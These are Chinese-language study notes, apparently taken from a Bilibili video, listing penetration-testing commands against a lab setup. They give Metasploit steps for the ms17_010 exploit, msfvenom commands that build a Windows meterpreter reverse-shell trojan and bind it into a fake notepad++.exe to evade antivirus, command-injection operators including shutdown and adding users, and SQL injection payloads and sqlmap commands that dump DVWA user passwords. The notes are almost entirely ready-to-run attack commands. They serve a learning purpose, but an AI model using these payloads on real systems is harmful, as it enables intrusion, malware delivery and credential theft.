取自上面的b站视频,这是部分学习笔记
1、远程控制
sudo su
msfconsole
search ms17_010
use 0
show options
set rhost
set lport
run
2、木马文件
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.129 lport=9999 -f exe -o demo1.exe
监控
msfconsole
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.182.129
set lport 9999
run
help
避免杀毒软件
捆绑木马msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.129 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
加密壳
3、命令执行漏洞
| ; &无论cmd1是否执行成功,cmd2将被执行
||cmd1失败,执行cmd2
&& cmd1成功,执行cmd2
cmd命令
whoami 查看用户名
ipconfig 看网卡信息
shutdown -s -t 0 关机
net user [][]/add
type[file_name]查看文件内容
白盒测试
黑盒测试 看不到源代码,命令连接符
空格的利用
4、SQL漏洞
select ticket_num from Movie_data where movie_name='' order by 1#';
原有的SQL语句被改变;
1判断是否可以sql注入
‘1' and 1=2#
进行sql注入
一、 判断列/字段数 1' order by 1#
2' order by 2#
3' order by 3#
2、联合查询
1'union select user(),database()#
3、联合查询表
1'union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#';
4、联合查询信息
1' union select user,password from users#';
SQLmap
kali linux
1、检测漏洞
python sqlmap.py -u "" --cookies=""//请求头的cookies
2、获取数据库名
python sqlmap.py -u "" --cookies="" --dbs
3、获取指定数据库表
python sqlmap.py -u "" --cookies="" -D dvwa --tables
4、python sqlmap.py -u "" --cookies="" -D dvwa -T users --columns
python sqlmap.py -u "" --cookies="" -D dvwa -T users --dump